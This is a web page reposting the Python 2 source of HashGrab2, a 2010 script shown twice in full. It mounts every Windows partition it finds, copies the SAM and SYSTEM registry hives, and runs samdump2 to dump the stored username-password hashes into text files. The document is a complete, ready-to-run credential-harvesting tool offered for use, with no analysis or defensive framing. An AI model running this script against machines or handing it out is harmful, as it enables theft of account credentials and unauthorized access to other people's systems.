HashGrab2: Extract Username Password Hashes from SAM and SYSTEM Files!
HashGrab2 automatically mounts any Windows drives it can find, and using samdump2 extracts username-password hashes from SAM and SYSTEM files located on the Windows drive, after which it writes them to user specified directory.
#!/usr/bin/env python
#Name: HashGrab2.py
#Version: 2.0
#Author: s3my0n
#Website: InterN0T.net
#########################################################################
# HashGrab2 automatically mounts any Windows drives it can find, and #
# using samdump2 extracts username-password hashes from SAM and SYSTEM #
# files located on the Windows drive, after which it writes them to #
# user specified directory. #
# #
# Copyright (C) 2010 s3my0n #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
#########################################################################
import sys, os, random, shutil, re, subprocess
from time import sleep
class HashGrab(object):
def __init__(self, basedir, filesystems=['HPFS/NTFS', 'FAT16/FAT32']):
self.basedir = basedir
self.filesystems = filesystems
self.dirstocheck = ['/WINDOWS/System32/config/', '/Windows/System32/config/',
'/WINNT/System32/config/', '/WINDOWS/system32/config/']
self.files = ['SYSTEM', 'SAM', 'system', 'sam']
self.hashes = {}
self.devs = []
self.mountdirs = []
self.samsystem_dirs = {}
self.filestocopy = []
def findPartitions(self):
decider = subprocess.Popen(('whoami'), stdout=subprocess.PIPE).stdout
decider = decider.read().strip()
if decider != 'root':
print '\n [-] Error: you are not root'
sys.exit(1)
else:
ofdisk = subprocess.Popen(('fdisk', '-l'), stdout=subprocess.PIPE).stdout
rfdisk = [i.strip() for i in ofdisk]
ofdisk.close()
for line in rfdisk:
for f in self.filesystems:
if f in line:
dev = re.findall('/\w+/\w+\d+', line)
self.devs.append(dev[0])
def mountPartitions(self):
def randgen(integer):
chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
x = random.sample(chars, integer)
randstring = ''.join(x)
return randstring
for dev in self.devs:
mname = randgen(6)
mdir = '/mnt/%s' % (mname)
self.mountdirs.append([mdir, mname])
os.mkdir(mdir)
cmd = subprocess.call(('mount', '%s'%(dev), '%s'%(mdir)))
if cmd == 1:
print '\n [-] Could not mount %s to %s: exiting' % (dev, mdir)
sys.exit(1)
else:
print '\n[*] Mounted %s to %s' % (dev, mdir)
def findSamSystem(self):
part_number = 0
for m in self.mountdirs:
self.filestocopy.append(m)
for d in self.dirstocheck:
for f in self.files:
cdir = '%s%s%s' % (m[0], d, f)
if os.path.isfile(cdir):
self.filestocopy[part_number].append(cdir)
part_number+=1
def copySamSystem(self):
nmountdirs = len(self.mountdirs)
decider = 0
ftocopy = []
for f in self.filestocopy:
if len(f) < 4:
decider += 1
else:
ftocopy.append(f)
if decider == nmountdirs:
print '\n [-] Could not find SAM and SYSTEM files in %s' % (self.devs)
self.cleanUp()
sys.exit()
else:
print '\n[*] Copying SAM and SYSTEM files...\n'
for f in ftocopy:
cpdir = '%s%s' % (self.basedir, f[1])
self.samsystem_dirs[f[1]] = cpdir
os.mkdir(cpdir)
shutil.copy(f[2], '%s/SYSTEM'%(cpdir))
shutil.copy(f[3], '%s/SAM'%(cpdir))
def extractHashes(self):
for d in self.samsystem_dirs:
try:
cmd = subprocess.Popen(('samdump2', '%s/SAM'%(self.samsystem_dirs[d]), '%s/SYSTEM'%(self.samsystem_dirs[d])), stdout=subprocess.PIPE).stdout
self.hashes[d] = cmd.readlines()
except OSError:
print '\n [-] SamDump2 was not found: exiting'
self.cleanUp()
sys.exit(1)
def writeHashes(self):
for i in self.hashes:
try:
ofile = open('%s%s.txt'%(self.basedir, i), 'w+')
hashes = self.hashes[i]
for line in hashes:
ofile.write(line)
ofile.close()
except IOError:
print '\n [-] Error: could not open %s to write hashes to' % ('%s%s.txt'%(self.basedir, i))
self.cleanUp(cpdirs=True)
sys.exit(1)
def cleanUp(self, devs=True, mdirs=True, cpdirs=False):
if devs:
print '\n[*] Unmounting partitions...'
sleep(1) # sometimes fails if you don't sleep
for dev in self.devs:
subprocess.call(('umount', '%s'%(dev)))
if mdirs:
print '\n[*] Deleting mount directories...'
for d in self.mountdirs:
os.rmdir(d[0])
if cpdirs:
print '\n[*] Deleting %s' % (self.samsystem_dirs.values())
for d in self.samsystem_dirs.values():
shutil.rmtree(d)
def about():
return r'''
_ _ _ ___
| | | | | | |__ \
| |__ __ _ ___| |__ __ _ _ __ __ _| |__ ) |
| '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / /
| | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_
|_| |_|\__,_|___/_| |_|\__, |_| \__,_|_.__/____|
__/ |
|___/
HashGrab v2.0 by s3my0n
http://InterN0T.net
Contact: RuSH4ck3R[at]gmail[dot]com
'''
if __name__=='__main__':
print about()
basedir = './' #change hashes copy directory (include "/" at the end of path)
decider = os.path.exists(basedir)
if (decider == True) and (basedir[-1:] == '/'):
hg = HashGrab(basedir)
hg.findPartitions()
hg.mountPartitions()
hg.findSamSystem()
hg.copySamSystem()
hg.extractHashes()
hg.writeHashes()
hg.cleanUp(cpdirs=True)
else:
print '\n [-] Error: check your basedir'
sys.exit(1)
HashGrab2 automatically mounts any Windows drives it can find, and using samdump2 extracts username-password hashes from SAM and SYSTEM files located on the Windows drive, after which it writes them to user specified directory.
#!/usr/bin/env python
#Name: HashGrab2.py
#Version: 2.0
#Author: s3my0n
#Website: InterN0T.net
#########################################################################
# HashGrab2 automatically mounts any Windows drives it can find, and #
# using samdump2 extracts username-password hashes from SAM and SYSTEM #
# files located on the Windows drive, after which it writes them to #
# user specified directory. #
# #
# Copyright (C) 2010 s3my0n #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
#########################################################################
import sys, os, random, shutil, re, subprocess
from time import sleep
class HashGrab(object):
def __init__(self, basedir, filesystems=['HPFS/NTFS', 'FAT16/FAT32']):
self.basedir = basedir
self.filesystems = filesystems
self.dirstocheck = ['/WINDOWS/System32/config/', '/Windows/System32/config/',
'/WINNT/System32/config/', '/WINDOWS/system32/config/']
self.files = ['SYSTEM', 'SAM', 'system', 'sam']
self.hashes = {}
self.devs = []
self.mountdirs = []
self.samsystem_dirs = {}
self.filestocopy = []
def findPartitions(self):
decider = subprocess.Popen(('whoami'), stdout=subprocess.PIPE).stdout
decider = decider.read().strip()
if decider != 'root':
print '\n [-] Error: you are not root'
sys.exit(1)
else:
ofdisk = subprocess.Popen(('fdisk', '-l'), stdout=subprocess.PIPE).stdout
rfdisk = [i.strip() for i in ofdisk]
ofdisk.close()
for line in rfdisk:
for f in self.filesystems:
if f in line:
dev = re.findall('/\w+/\w+\d+', line)
self.devs.append(dev[0])
def mountPartitions(self):
def randgen(integer):
chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
x = random.sample(chars, integer)
randstring = ''.join(x)
return randstring
for dev in self.devs:
mname = randgen(6)
mdir = '/mnt/%s' % (mname)
self.mountdirs.append([mdir, mname])
os.mkdir(mdir)
cmd = subprocess.call(('mount', '%s'%(dev), '%s'%(mdir)))
if cmd == 1:
print '\n [-] Could not mount %s to %s: exiting' % (dev, mdir)
sys.exit(1)
else:
print '\n[*] Mounted %s to %s' % (dev, mdir)
def findSamSystem(self):
part_number = 0
for m in self.mountdirs:
self.filestocopy.append(m)
for d in self.dirstocheck:
for f in self.files:
cdir = '%s%s%s' % (m[0], d, f)
if os.path.isfile(cdir):
self.filestocopy[part_number].append(cdir)
part_number+=1
def copySamSystem(self):
nmountdirs = len(self.mountdirs)
decider = 0
ftocopy = []
for f in self.filestocopy:
if len(f) < 4:
decider += 1
else:
ftocopy.append(f)
if decider == nmountdirs:
print '\n [-] Could not find SAM and SYSTEM files in %s' % (self.devs)
self.cleanUp()
sys.exit()
else:
print '\n[*] Copying SAM and SYSTEM files...\n'
for f in ftocopy:
cpdir = '%s%s' % (self.basedir, f[1])
self.samsystem_dirs[f[1]] = cpdir
os.mkdir(cpdir)
shutil.copy(f[2], '%s/SYSTEM'%(cpdir))
shutil.copy(f[3], '%s/SAM'%(cpdir))
def extractHashes(self):
for d in self.samsystem_dirs:
try:
cmd = subprocess.Popen(('samdump2', '%s/SAM'%(self.samsystem_dirs[d]), '%s/SYSTEM'%(self.samsystem_dirs[d])), stdout=subprocess.PIPE).stdout
self.hashes[d] = cmd.readlines()
except OSError:
print '\n [-] SamDump2 was not found: exiting'
self.cleanUp()
sys.exit(1)
def writeHashes(self):
for i in self.hashes:
try:
ofile = open('%s%s.txt'%(self.basedir, i), 'w+')
hashes = self.hashes[i]
for line in hashes:
ofile.write(line)
ofile.close()
except IOError:
print '\n [-] Error: could not open %s to write hashes to' % ('%s%s.txt'%(self.basedir, i))
self.cleanUp(cpdirs=True)
sys.exit(1)
def cleanUp(self, devs=True, mdirs=True, cpdirs=False):
if devs:
print '\n[*] Unmounting partitions...'
sleep(1) # sometimes fails if you don't sleep
for dev in self.devs:
subprocess.call(('umount', '%s'%(dev)))
if mdirs:
print '\n[*] Deleting mount directories...'
for d in self.mountdirs:
os.rmdir(d[0])
if cpdirs:
print '\n[*] Deleting %s' % (self.samsystem_dirs.values())
for d in self.samsystem_dirs.values():
shutil.rmtree(d)
def about():
return r'''
_ _ _ ___
| | | | | | |__ \
| |__ __ _ ___| |__ __ _ _ __ __ _| |__ ) |
| '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / /
| | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_
|_| |_|\__,_|___/_| |_|\__, |_| \__,_|_.__/____|
__/ |
|___/
HashGrab v2.0 by s3my0n
http://InterN0T.net
Contact: RuSH4ck3R[at]gmail[dot]com
'''
if __name__=='__main__':
print about()
basedir = './' #change hashes copy directory (include "/" at the end of path)
decider = os.path.exists(basedir)
if (decider == True) and (basedir[-1:] == '/'):
hg = HashGrab(basedir)
hg.findPartitions()
hg.mountPartitions()
hg.findSamSystem()
hg.copySamSystem()
hg.extractHashes()
hg.writeHashes()
hg.cleanUp(cpdirs=True)
else:
print '\n [-] Error: check your basedir'
sys.exit(1)
